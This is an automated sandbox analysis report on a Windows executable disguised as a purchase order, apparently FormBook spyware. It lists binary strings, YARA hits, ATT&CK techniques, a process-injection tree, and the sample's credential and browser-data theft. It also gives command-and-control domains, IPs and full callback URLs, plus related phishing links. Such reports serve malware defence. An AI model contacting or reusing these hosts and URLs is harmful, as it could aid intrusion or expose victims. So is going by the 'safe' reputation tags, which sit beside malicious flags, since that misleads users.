Source: Purchase Order TE- 00011-7777.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: Purchase Order TE- 00011-7777.exe | Binary or memory string: WIN_81
Source: Purchase Order TE- 00011-7777.exe | Binary or memory string: WIN_XP
Source: Purchase Order TE- 00011-7777.exe | Binary or memory string: WIN_XPe
Source: Purchase Order TE- 00011-7777.exe | Binary or memory string: WIN_VISTA
Source: Purchase Order TE- 00011-7777.exe | Binary or memory string: WIN_7
Source: Purchase Order TE- 00011-7777.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket (0_2_00AE91DC)
Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket (0_2_00AE96E2)
MITRE ATT&CK matrix, listed per tactic column (the number in parentheses is the count badge the report shows next to a matched technique; techniques without a number are unmatched matrix cells):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1510012 | Sample: Purchase Order TE- 00011-7777.exe | Start date: 12/09/2024 | Architecture: WINDOWS | Score: 100
Start node: DNS/IP: www.kckartal.xyz; www.golbasi-nakliyat.xyz; 17 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 6 other signatures. www.golbasi-nakliyat.xyz: Performs DNS queries to domains with low reputation.
Purchase Order TE- 00011-7777.exe (started from the start node): Writes to foreign memory regions; Maps a DLL or memory area into another process
  svchost.exe (started by Purchase Order TE- 00011-7777.exe): Maps a DLL or memory area into another process
    CjeBlighAyoJst.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
      RMActivate_ssp.exe (started by CjeBlighAyoJst.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        CjeBlighAyoJst.exe (injected by RMActivate_ssp.exe): Found direct / indirect Syscall (likely to bypass EDR). DNS/IP: www.quilo.life (203.161.43.228, ports 49730, 49731, 49732, VNPT-AS-VNVNPTCorpVN, Malaysia); mfgamecompany.shop (185.173.111.76, ports 49726, 49727, 49728, TERRATRANSIT-ASDE, Germany); 8 other IPs or domains
        firefox.exe (started by RMActivate_ssp.exe)

Source | Detection | Scanner | Label
Purchase Order TE- 00011-7777.exe | 29% | ReversingLabs |
Purchase Order TE- 00011-7777.exe | 30% | Virustotal |
Purchase Order TE- 00011-7777.exe | 100% | Avira | HEUR/AGEN.1321695
Purchase Order TE- 00011-7777.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner
hm62t.top | 2% | Virustotal
bola88site.one | 0% | Virustotal
www.726075.buzz | 1% | Virustotal
natroredirect.natrocdn.com | 0% | Virustotal
www.hm62t.top | 2% | Virustotal
www.qiluqiyuan.buzz | 1% | Virustotal
freepicture.online | 1% | Virustotal
www.mfgamecompany.shop | 0% | Virustotal
www.bola88site.one | 0% | Virustotal
www.monos.shop | 0% | Virustotal
www.golbasi-nakliyat.xyz | 2% | Virustotal
www.freepicture.online | 1% | Virustotal
www.318st.com | 0% | Virustotal
www.kxshopmr.store | 0% | Virustotal
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.mizuquan.top | 0% | Avira URL Cloud | safe
http://www.mizuquan.top/ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRp | 0% | Avira URL Cloud | safe
http://www.bola88site.one/3lkx/ | 0% | Avira URL Cloud | safe
http://www.hm62t.top/p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp | 0% | Avira URL Cloud | safe
http://www.freepicture.online/xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRp | 0% | Avira URL Cloud | safe
http://www.mfgamecompany.shop/lwt6/ | 0% | Avira URL Cloud | safe
https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ | 0% | Avira URL Cloud | safe
http://www.golbasi-nakliyat.xyz/k2vl/ | 0% | Avira URL Cloud | safe
http://www.mfgamecompany.shop/lwt6/ | 1% | Virustotal |
http://www.kckartal.xyz/h5qr/ | 0% | Avira URL Cloud | safe
http://www.quilo.life/ftr3/ | 0% | Avira URL Cloud | safe
http://www.kckartal.xyz/h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRp | 0% | Avira URL Cloud | safe
http://www.hm62t.top/p39s/ | 0% | Avira URL Cloud | safe
http://www.mizuquan.top/ed2j/ | 0% | Avira URL Cloud | safe
http://www.golbasi-nakliyat.xyz/k2vl/ | 2% | Virustotal |
http://www.quilo.life/ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRp | 0% | Avira URL Cloud | safe
http://www.freepicture.online/xcfw/ | 0% | Avira URL Cloud | safe
http://www.hm62t.top/p39s/ | 1% | Virustotal |
http://www.qiluqiyuan.buzz/wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRp | 0% | Avira URL Cloud | safe
http://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ== | 0% | Avira URL Cloud | safe
http://www.golbasi-nakliyat.xyz/k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp | 0% | Avira URL Cloud | safe
http://www.qiluqiyuan.buzz/wjff/ | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
http://www.freepicture.online/xcfw/ | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hm62t.top | 154.23.184.240 | true | true | | unknown
www.kckartal.xyz | 104.21.20.125 | true | true | | unknown
www.quilo.life | 203.161.43.228 | true | true | | unknown
bola88site.one | 172.96.191.39 | true | true | | unknown
www.mizuquan.top | 43.242.202.169 | true | true | | unknown
freepicture.online | 89.58.49.1 | true | true | | unknown
mfgamecompany.shop | 185.173.111.76 | true | true | | unknown
www.726075.buzz | 47.57.185.227 | true | true | | unknown
www.qiluqiyuan.buzz | 161.97.168.245 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown
www.golbasi-nakliyat.xyz | unknown | unknown | true | | unknown
www.freepicture.online | unknown | unknown | true | | unknown
www.monos.shop | unknown | unknown | true | | unknown
www.hm62t.top | unknown | unknown | true | | unknown
www.mfgamecompany.shop | unknown | unknown | true | | unknown
www.bola88site.one | unknown | unknown | true | | unknown
www.318st.com | unknown | unknown | true | | unknown
www.kxshopmr.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.hm62t.top/p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp | true | Avira URL Cloud: safe | unknown
http://www.bola88site.one/3lkx/ | true | Avira URL Cloud: safe | unknown
http://www.mizuquan.top/ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRp | true | Avira URL Cloud: safe | unknown
http://www.freepicture.online/xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRp | true | Avira URL Cloud: safe | unknown
http://www.mfgamecompany.shop/lwt6/ | true | 1% Virustotal; Avira URL Cloud: safe | unknown
http://www.golbasi-nakliyat.xyz/k2vl/ | true | 2% Virustotal; Avira URL Cloud: safe | unknown
http://www.kckartal.xyz/h5qr/ | true | Avira URL Cloud: safe | unknown
http://www.kckartal.xyz/h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRp | true | Avira URL Cloud: safe | unknown
http://www.quilo.life/ftr3/ | true | Avira URL Cloud: safe | unknown
http://www.hm62t.top/p39s/ | true | 1% Virustotal; Avira URL Cloud: safe | unknown
http://www.mizuquan.top/ed2j/ | true | Avira URL Cloud: safe | unknown
http://www.quilo.life/ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRp | true | Avira URL Cloud: safe | unknown
http://www.freepicture.online/xcfw/ | true | 1% Virustotal; Avira URL Cloud: safe | unknown
http://www.qiluqiyuan.buzz/wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRp | true | Avira URL Cloud: safe | unknown
http://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ== | true | Avira URL Cloud: safe | unknown
http://www.golbasi-nakliyat.xyz/k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp | true | Avira URL Cloud: safe | unknown
http://www.qiluqiyuan.buzz/wjff/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.mizuquan.top | CjeBlighAyoJst.exe, 00000006.00000002.3889597488.0000000004BD7000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ | RMActivate_ssp.exe, 00000004.00000002.3888738930.0000000004040000.00000004.10000000.00040000.00000000.sdmp; CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003490000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000041D2000.00000004.10000000.00040000.00000000.sdmp; CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003622000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.43.228 | www.quilo.life | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
172.96.191.39 | bola88site.one | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
104.21.20.125 | www.kckartal.xyz | United States | 13335 | CLOUDFLARENETUS | true
47.57.185.227 | www.726075.buzz | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
89.58.49.1 | freepicture.online | Germany | 5430 | FREENETDEfreenetDatenkommunikationsGmbHDE | true
154.23.184.240 | hm62t.top | United States | 174 | COGENT-174US | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
185.173.111.76 | mfgamecompany.shop | Germany | 42366 | TERRATRANSIT-ASDE | true
43.242.202.169 | www.mizuquan.top | Hong Kong | 40065 | CNSERVERSUS | true
161.97.168.245 | www.qiluqiyuan.buzz | United States | 51167 | CONTABODE | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1510012
Start date and time: 2024-09-12 13:01:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase Order TE- 00011-7777.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@13/10
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 92%
                    • Number of executed functions: 51
                    • Number of non-executed functions: 289
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
07:02:56 | API Interceptor | 7130797x Sleep call for process: RMActivate_ssp.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.161.43.228 | Payment confirmation 20240911.exe | malicious | FormBook | www.quilo.life/ftr3/
203.161.43.228 | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | www.quilo.life/ftr3/
203.161.43.228 | Jsn496Em5T.exe | malicious | FormBook | www.virox.top/basq/
203.161.43.228 | Doc_PO6900000827.exe | malicious | FormBook | www.quilo.life/ftr3/
203.161.43.228 | PO_20240906011824.exe | malicious | FormBook | www.quilo.life/ftr3/
203.161.43.228 | 6i4QCFbsNi.exe | malicious | FormBook | www.virox.top/basq/
203.161.43.228 | DEBIT NOTE July 2024 PART 2.exe | malicious | FormBook | www.lyxor.top/top4/
203.161.43.228 | PO 18-3081.exe | malicious | FormBook | www.velix.buzz/0qme/
203.161.43.228 | GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe | malicious | FormBook | www.fynra.xyz/i65r/
203.161.43.228 | AIDHL3290435890.exe | malicious | FormBook | www.quilo.life/ftr3/
172.96.191.39 | Payment confirmation 20240911.exe | malicious | FormBook | www.bola88site.one/3lkx/
172.96.191.39 | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | www.bola88site.one/3lkx/
172.96.191.39 | Doc_PO6900000827.exe | malicious | FormBook | www.bola88site.one/3lkx/
172.96.191.39 | PO_20240906011824.exe | malicious | FormBook | www.bola88site.one/3lkx/
172.96.191.39 | doc330391202408011.exe | malicious | FormBook | www.bola88site.one/wqrm/
172.96.191.39 | PO #86637.exe | malicious | FormBook | www.bola88site.one/3qit/
172.96.191.39 | REQST_PRC 410240665_2024.exe | malicious | FormBook | www.bola88site.one/wqrm/
172.96.191.39 | REQST_PRC 410240.exe | malicious | FormBook | www.bola88site.one/wqrm/
172.96.191.39 | COTIZACION 290824.exe | malicious | FormBook | www.bola88site.one/3qit/
172.96.191.39 | IMG_00991ORDER_FILES.exe | malicious | FormBook, GuLoader | www.bola88site.one/frol/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.kckartal.xyz | Payment confirmation 20240911.exe | malicious | FormBook | 104.21.20.125
www.kckartal.xyz | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 104.21.20.125
www.kckartal.xyz | Doc_PO6900000827.exe | malicious | FormBook | 172.67.192.227
www.kckartal.xyz | PO_20240906011824.exe | malicious | FormBook | 172.67.192.227
www.kckartal.xyz | AIDHL3290435890.exe | malicious | FormBook | 104.21.20.125
www.kckartal.xyz | PO#4510065525.exe | malicious | FormBook | 104.21.20.125
www.quilo.life | Payment confirmation 20240911.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | Doc_PO6900000827.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | PO_20240906011824.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | AIDHL3290435890.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | PO#4510065525.exe | malicious | FormBook | 203.161.43.228
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VNPT-AS-VNVNPTCorpVN | Payment confirmation 20240911.exe | malicious | FormBook | 203.161.43.228
VNPT-AS-VNVNPTCorpVN | PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VNVNPTCorpVN | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 203.161.43.228
VNPT-AS-VNVNPTCorpVN | Jsn496Em5T.exe | malicious | FormBook | 203.161.43.228
VNPT-AS-VNVNPTCorpVN | MV ALIADO-S-REQ-19-000640.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VNVNPTCorpVN | Doc_PO6900000827.exe | malicious | FormBook | 203.161.43.228
VNPT-AS-VNVNPTCorpVN | PO_20240906011824.exe | malicious | FormBook | 203.161.43.228
VNPT-AS-VNVNPTCorpVN | doc330391202408011.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VNVNPTCorpVN | yyyyyyyy.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VNVNPTCorpVN | 1V8XAuKZqe.exe | malicious | FormBook | 203.161.42.161
CLOUDFLARENETUS | Purchase order.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | http://sparksphere.ru/RMSzv | malicious | HTMLPhisher | 172.67.147.72
CLOUDFLARENETUS | https://www.jtsmedicalcentre.com/adobereader/adobe.php?email=cemfa_gab_sec@emfa.pt | malicious | Unknown | 104.26.1.147
CLOUDFLARENETUS | https://smarthdd.com/smarthdd-setup.exe | malicious | Unknown | 104.16.79.73
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exe | malicious | Unknown | 104.16.184.241
CLOUDFLARENETUS | https://purdue0-my.sharepoint.com/:b:/g/personal/smharrel_purdue_edu/EfkZDXWGfClCplaGiKthQoUBK8GXZs5ymE-vf6tacU7vPA?e=VQBHbe | malicious | HtmlDropper | 188.114.96.3
CLOUDFLARENETUS | Rechnung_2024-09-03_100148163067_V21648588.html | malicious | Unknown | 104.18.11.207
CLOUDFLARENETUS | https://uber-dot-yamm-track.appspot.com/23n9C3332xIef2u5qB3FsmMdRmfEUl0juRObEDek2QVW5jqPgkQEUDSjSUOie_PPRN8ZIzLjnKIYf_EcAN6wtHAg6tDGTRfHt9lfAtxT0weLuCVbKoSw6asqJ_UhM7uDzWEWI_6d_QbLGjPw8-X4Ds4m4YHqne99SLBLa7IzDhqNM5JIp-h783DTvcZTRawQQ0zSL | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | Quotation Approved PO#2838800-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/Yp0Hz21d/bGF1cmVuLmNvaGVuQGJvYXJzaGVhZC5jb20==$%E3%80%82?safe=active | malicious | Unknown | 47.246.131.28
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://Np8W.pivorixal.su/zbs3/?qrc=qa-sqi@qvcjp.com | malicious | HTMLPhisher | 47.246.131.144
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Payment confirmation 20240911.exe | malicious | FormBook | 47.57.185.227
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://xlchome.com/ | malicious | Unknown | 8.209.255.96
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://is.gd/af4MWe?US=937448/ | malicious | Unknown | 47.245.132.166
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://login-wsapp-hk.top/ | malicious | Unknown | 8.210.39.246
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com////amp/s/jbmagneticos.com.br/.dev/VGCU2YC1/c211bGxpbmdzQHRtaGNjLmNvbQ== | malicious | HTMLPhisher | 47.246.146.53
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bva%C2%ADnd%C2%ADat%C2%ADco%E2%80%8B.%C2%ADv%C2%ADn/.dev/ChZuQF9L/bHlubi5wYXJzb25zQGltYWdvLmNvbW11bml0eQ===$%E3%80%82 | malicious | HTMLPhisher | 47.246.131.135
